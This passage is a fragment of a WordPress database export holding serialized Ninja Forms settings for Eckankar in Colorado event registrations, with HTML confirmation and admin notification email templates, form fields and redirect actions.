role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <br>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">\'Experience                                The Sound of Soul\'<br>                                Event Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding: 30px; padding-top:10px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Hello                                  {field:firstname},<span style=\"color: #333333; font-size: 20px;\"></span><br>                                </span></p>                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Thank                                  You For Registering!                                  <br>                                </span></p>                              <p class=\"\" style=\"font-size: 18px;\">                                <b>You Are Signed Up                                  For The Following                                  Zoom Event:<br>                                  <span style=\"color: #23507d; font-size: 17px;\">\'Experience                                    The Sound of Soul\'                                    - Online<br></span><span style=\"color: #23507d;font-size: 17px;\">10:30                                    AM to 11:30 AM.</span></b></p>                              <p class=\"\" style=\"font-size: 19px; color: #f28a27;\"><strong>Zoom                                  Login Information:</strong></p>                              <strong>Meeting ID:</strong>                              891 2510 3432<br>                              <strong>Passcode: </strong>162109<br>                              <br>                              <strong>Join Zoom Meeting                                from a web browser:</strong><br>                              <a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a><br>                              <br>                              After you click the link,                              you will be prompted to                              either download the app                              to enter the meeting or                              enter through your                              browser. Please note that                              Zoom works best if you                              download the app. It is                              more stable and has more                              functions. Select use                              computer audio for sound.<br>                              <br>                              Please join the meeting 5                              - 10 minutes ahead of                              time to help us start on                              time. We look forward to                              seeing you at this online                              event.<br>                              <br>                              See you there!</td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">                              <p style=\"margin: 0;\">You                                are receiving this                                email because you have                                submitted a request                                through the <a href=\"https://eckankar-colorado.org/\">Eckankar                                  in Colorado website.</a></p>                              <p style=\"text-align: center; font-family: Arial, Helvetica, sans-serif; font-size: 15px;\">If                                you have any questions                                regarding the origin of                                this email, please feel                                free to get in touch,                                we\'re always happy to                                help out.</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\">                              <p style=\"margin: 0 0 8px 0;\"><a style=\"text-decoration: none;\" href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\"><img style=\"display: inline-block; color: #cccccc;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\"></a>&nbsp;</p>                              <p style=\"margin: 0; font-size: 14px; line-height: 20px;\">©                                Eckankar In Colorado -                                2021<br>                                <a class=\"unsub\" style=\"color: #cccccc; text-decoration: underline;\" href=\"mailto:webmaster@eckankar-colorado.org\">Contact                                  Us</a></p>                            </td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]--></td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>\";s:13:\"email_subject\";s:39:\"Thank you for registering for our event\";s:3:\"tag\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:7:\"message\";s:18:\"{all_fields_table}\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:2:\"to\";s:13:\"{field:email}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:20:\"{system:admin_email}\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:176;}i:2;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:24:\"Admin Email Notification\";s:14:\"drawerDisabled\";s:0:\"\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:62:\"New Event Registration from {field:firstname} {field:lastname}\";s:13:\"email_message\";s:4545:\"      <meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1252\">    <title>ADMIN NOTIFICATION - FINAL</title>        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <span style=\"padding:0px 0px 0px 0px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">New SOSE Web Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding-left: 30px; padding-right 30px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #333333; font-size: 20px;\"><b><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                        </span></span></span></b></span></p>                              <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Admin                                  Notification<br>                                </b></p>                              <b>                                <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A                                  new SOSE registration                                  has been received. <span style=\"color: #333333; font-size: 20px;\"></span></p>                              </b>                              <p></p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\"><b>Registrant                                Information:</b><br>                              <br>                              <strong>Name:</strong>&nbsp;                              <span style=\"display: inline-block;\">{field:firstname}                                {field:lastname}<br>                              </span>                              <p style=\"font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\">                                <strong>Email:</strong>&nbsp;                                {field:email}</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 16px; background-color: #747474; color: #cccccc;\">Regards,<br>                              Your ECK in Colorado                              Website</td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]-->                    </td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>  \";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:177;}i:3;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:16:\"Store Submission\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"order\";s:1:\"3\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";}s:2:\"id\";i:175;}i:4;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:4:\"type\";s:8:\"redirect\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-10-18 10:05:09\";s:5:\"label\";s:8:\"Redirect\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:12:\"redirect_url\";s:69:\"https://eckankar-colorado.org/thank-you-for-signing-up-for-our-event/\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:210;}}s:8:\"settings\";a:35:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:32:\"Sound of Soul Event Registration\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:10:\"form_title\";s:18:\"Event Registration\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";i:0;s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:3:\"key\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:7:{i:0;s:45:\"sound_of_soul_zoom_registration_1617130354644\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";i:6;s:20:\"submit_1618628929218\";}s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:20:\"repeatable_fieldsets\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(46,'a:7:{s:2:\"id\";i:46;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:7:{i:0;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"1\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:40:\"ECK Light and Sound Service Registration\";s:3:\"key\";s:54:\"eck_light_and_sound_service_registration_1620150522553\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:313:\"<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">ECK Light and Sound Service Registration</p><p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:31:\"Sound of Soul Zoom Registration\";s:9:\"field_key\";s:45:\"sound_of_soul_zoom_registration_1617130354644\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:422;}i:1;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"2\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:2:\"hr\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:2:\"hr\";}s:2:\"id\";i:424;}i:2;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"label\";s:10:\"First Name\";s:3:\"key\";s:9:\"firstname\";s:4:\"type\";s:9:\"firstname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:9:\"firstname\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:425;}i:3;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"4\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:9:\"Last Name\";s:3:\"key\";s:8:\"lastname\";s:4:\"type\";s:8:\"lastname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:8:\"lastname\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:426;}i:4;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"5\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:5:\"email\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:427;}i:5;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"8\";s:11:\"idAttribute\";s:2:\"id\";s:3:\"key\";s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";s:13:\"element_class\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:5:\"label\";s:0:\"\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:158:\"<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:0:\"\";s:9:\"field_key\";s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";}s:2:\"id\";i:423;}i:6;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"9\";s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:3:\"key\";s:20:\"submit_1618628929218\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:20:\"submit_1618628929218\";}s:2:\"id\";i:428;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-05-04 10:48:03\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";s:1:\"1\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:228:\"<p style=\" font-size:20pt;color:#1d5791;\" align=\"center\"><b>Thank you for registering for our event!</b></p>\n<p style=\" font-size:16pt;color:#333333\" align=\"center\">You will receive an email soon with Zoom Login information.</p>\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:186;}i:1;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-05-04 10:48:03\";s:5:\"label\";s:29:\"ECK Registration Confirmation\";s:13:\"email_message\";s:8301:\"<meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\">    <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">    <meta name=\"x-apple-disable-message-reformatting\">    <title>ELSS REGISTRATION - USER CONFIRMATION</title>    <!--[if mso]>  <style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style>  <noscript>    <xml>      <o:OfficeDocumentSettings>        <o:PixelsPerInch>96</o:PixelsPerInch>      </o:OfficeDocumentSettings>    </xml>  </noscript>  <![endif]-->    <style>    table, td, div, h1, p {      font-family: Arial, sans-serif;    }    @media screen and (max-width: 530px) {      .unsub {        display: block;        padding: 8px;        margin-top: 14px;        border-radius: 6px;        background-color: #555555;        text-decoration: none !important;        font-weight: bold;      }      .col-lge {        max-width: 100% !important;      }    }    @media screen and (min-width: 531px) {      .col-sml {        max-width: 27% !important;      }      .col-lge {        max-width: 73% !important;      }    }  </style>        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0; border:solid 1px #cccccc;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <br>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">ECK                                Light and Sound Service<br>                                Event Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding: 30px; padding-top:10px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Hello                                  {field:firstname},<span style=\"color: #333333; font-size: 20px;\"></span><br>                                </span></p>                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Thank                                  You For Registering!                                  <br>                                </span></p>                              <p class=\"\" style=\"font-size: 18px;\">                                <b>You Are Signed Up                                  For The Following                                  Zoom Event:<br>                                  <span style=\"color: #23507d; font-size: 17px;\">ECK                                    Light &amp; Sound                                    Service - Online<br></span><span style=\"color: #23507d;font-size: 17px;\">10:30 AM to 11:30 AM MDT.</span></b></p>                              <p class=\"\" style=\"font-size: 19px; color: #f28a27;\"><strong>Zoom                                  Login Information:</strong></p>                              <strong>Meeting ID:</strong>                              834 9746 0655<br>                              <strong>Passcode: </strong>867156<br>                              <br>                              <strong>Join Zoom Meeting                                from a web browser:</strong><br>                              <a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a><br>                              <br>                              After you click the link,                              you will be prompted to                              either download the app                              to enter the meeting or                              enter through your                              browser. Please note that                              Zoom works best if you                              download the app. It is                              more stable and has more                              functions. Select use                              computer audio for sound.<br>                              <br>                              Please join the meeting 5                              - 10 minutes ahead of                              time to help us start on                              time. We look forward to                              seeing you at this online                              event.<br>                              <br>                              See you there!</td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">                              <p style=\"margin: 0;\">You                                are receiving this                                email because you have                                submitted a request                                through the <a href=\"https://eckankar-colorado.org/\">Eckankar                                  in Colorado website.</a></p>                              <p style=\"text-align: center; font-family: Arial, Helvetica, sans-serif; font-size: 15px;\">If                                you have any questions                                regarding the origin of                                this email, please feel                                free to get in touch,                                we\'re always happy to                                help out.</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\">                              <p style=\"margin: 0 0 8px 0;\"><a style=\"text-decoration: none;\" href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\"><img style=\"display: inline-block; color: #cccccc;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\"></a>&nbsp;</p>                              <p style=\"margin: 0; font-size: 14px; line-height: 20px;\">©                                Eckankar In Colorado -                                2021<br>                                <a class=\"unsub\" style=\"color: #cccccc; text-decoration: underline;\" href=\"mailto:webmaster@eckankar-colorado.org\">Contact                                  Us</a></p>                            </td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]--></td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>\";s:13:\"email_subject\";s:39:\"Thank you for registering for our event\";s:3:\"tag\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:7:\"message\";s:18:\"{all_fields_table}\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:2:\"to\";s:13:\"{field:email}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:20:\"{system:admin_email}\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:184;}i:2;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-05-04 10:48:03\";s:5:\"label\";s:24:\"Admin Email Notification\";s:14:\"drawerDisabled\";s:0:\"\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:62:\"New Event Registration from {field:firstname} {field:lastname}\";s:13:\"email_message\";s:4517:\"      <meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1252\">        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0;\">        <tbody>          <tr>            <td 